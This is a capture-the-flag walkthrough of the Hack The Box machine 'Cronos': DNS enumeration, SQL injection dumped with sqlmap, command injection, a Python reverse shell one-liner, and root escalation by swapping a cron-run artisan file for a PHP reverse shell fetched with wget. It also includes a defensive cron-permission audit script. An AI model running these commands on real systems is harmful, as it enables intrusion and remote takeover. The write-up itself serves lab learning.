# Cronos

## Nmap

```
sudo nmap 10.10.10.13 -p- -sS -sV 

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

**Note:** Add `10.10.10.13 cronos.htb` to `/etc/hosts`. Also add 10.10.10.13 as an additional DNS server on the attacking system.

### DNS

To start, we perform some basic `DNS` enumeration against the target system. Using `dnsenum` we are able to enumerate the `admin.cronos.htb` subdomain, which we add to our hosts file.

```
dnsenum --dnsserver '10.10.10.13' --enum 'cronos.htb'
```

![](/files/89nXu5xwumNCmN6HaAdP)

### Cronos.htb

Checking out the root page for `http://cronos.htb`, we are taken to `/index.php`. I was unable to pull any further interesting pages or directories from this website.

![](/files/ZvMv8gWAW2n6eDyCqRad)

`Feroxbuster` turning up very few results...

![](/files/5FlxH7uNXw0erDfunkFb)

### admin.cronos.htb

We know that the subdomain `admin.cronos.htb` exists, so we browse to it and are presented with a logon page. Running ZAProxy in the background, we are able to identify a `SQL` injection point on the login page as shown below.

![](/files/HwbQZafhkgfKaMx9luwt)

Details regarding the `SQL` injection point.

![](/files/qDVUelCJGSs3mWysByeK)

### SQLmap

Using `SQLmap` we are able to pull relevant information.

```
sqlmap -u 'http://admin.cronos.htb/' --batch --forms --tables
```

After running the above command `SQLmap` identifies the database "admin". Using the command below we are able to dump discovered information from the "users" table.

```
sqlmap -u 'http://admin.cronos.htb/' --batch --forms -T users -D admin --dump 
```

![](/files/Ftn3RCqPpOiA4B7emkxx)

I was unable to crack the hash using the rockyou.txt wordlist. However, searching online we find a clear text password for the related MD5 hash.

### Hash lookup

![](/files/hwmKuCvsQki69Gx2dbiz)

### Net Tool v0.1

Using the credentials on the login page we are then presented with `Net Tool v0.1`.

![](/files/xZwizOjVmj9b6OSmFMHm)

Performing a `ping` request and capturing the POST request in `ZAProxy` we see where the command parameter is set.

![](/files/3hz6GkUiwqHBPtpCg6W8)

A quick check with `cat` on `/etc/passwd` shows we are able to alter what command the target system executes.

![](/files/OmCOJYJaOgSe5KHLd6eN)

Contents of `/etc/passwd`.

![](/files/ttY7apMmpP3UDjqJLeSH)

### Shell as www-data

From here we will build a Python reverse shell and run it in ZAProxy to obtain a reverse shell.

```
export RHOST="10.10.14.6";export RPORT=80;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
```

![](/files/Q93QOWdGiZvYBjJtYBvx)

The shell soon connects to our listener.

![](/files/XgMrCcTLzF6crooU9c0p)

### User.txt

We can then grab the user flag from `/home/noulis/user.txt`.

![](/files/NCcYkH8kVD79W4Il9q2R)

### Enumeration

Running `linpeas.sh` for enumeration, we identify a cron job that runs Laravel's `artisan` every minute as the **root** user.

![](/files/hV9Euz3VxPPDN1I9IHGb)

Browsing to `/var/www/laravel` we see we have full permissions as www-data over the artisan file.

![](/files/Lyzh0fFKw3ZHPeLRPz3r)
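From the defender's side, this misconfiguration (a root cron job running a file that a non-root account can change) can be audited directly. The following is an added example, not part of the original writeup: the crontab text is a constructed sample in `/etc/crontab` format, and the function names are hypothetical. It also checks each file's parent directory, because a writable directory lets the file be deleted and replaced.

```python
import os
import stat

# Constructed sample in /etc/crontab format (m h dom mon dow user command).
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
*/5 * * * * www-data /usr/local/bin/cleanup.sh
"""

def root_job_paths(crontab_text):
    """Yield (command, path) for absolute paths named in jobs that run as root."""
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)
        if len(fields) < 7 or fields[5] != "root":
            continue  # variable assignment, short line, or non-root job
        for token in fields[6].split():
            if token.startswith("/"):
                yield fields[6], token

def writable_by_non_root(st):
    """True if someone other than root can modify the object described by st."""
    if st.st_uid != 0 or st.st_mode & stat.S_IWOTH:
        return True  # a non-root owner can always rewrite or chmod it
    return bool(st.st_mode & stat.S_IWGRP) and st.st_gid != 0

def audit(crontab_text, stat_fn=os.stat):
    """Return sorted (target, command) findings for root cron jobs."""
    findings = set()
    for command, path in root_job_paths(crontab_text):
        # Check the parent too: a writable directory allows delete-and-replace.
        for target in (path, os.path.dirname(path)):
            try:
                st = stat_fn(target)
            except OSError:
                continue
            kind_ok = stat.S_ISREG(st.st_mode) or stat.S_ISDIR(st.st_mode)
            if kind_ok and writable_by_non_root(st):  # ignores devices like /dev/null
                findings.add((target, command))
    return sorted(findings)

if __name__ == "__main__":
    for target, command in audit(SAMPLE_CRONTAB):
        print(f"[!] {target} is writable by non-root; root cron runs: {command}")
```

On a real host, pass the contents of `/etc/crontab` and the files under `/etc/cron.d` to `audit()`; any finding means the file and directory should be owned by root and not group- or world-writable, or the job should run as the unprivileged user.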

### Privilege Escalation

Given the full permissions, we can create a `PHP` reverse shell on our attacking system, name it `artisan`, and transfer it over to the target system. RevShells was utilized to create the PHP monkey reverse shell.

**RevShells:** <https://www.revshells.com/>

![](/files/KiLRD8RGGKpOmXr6oDO4)

Remove the current artisan file and upload the reverse shell file.

```
rm artisan
wget http://10.10.14.6:8000/artisan
```

![](/files/6Ayy21onToCxsR6oPSCL)

### Shell as root

After the file has been uploaded, start a `netcat` listener and wait a minute or two for the cron job to trigger a reverse shell.

![](/files/BzI0Ha19JN4wR7Zq1vwv)

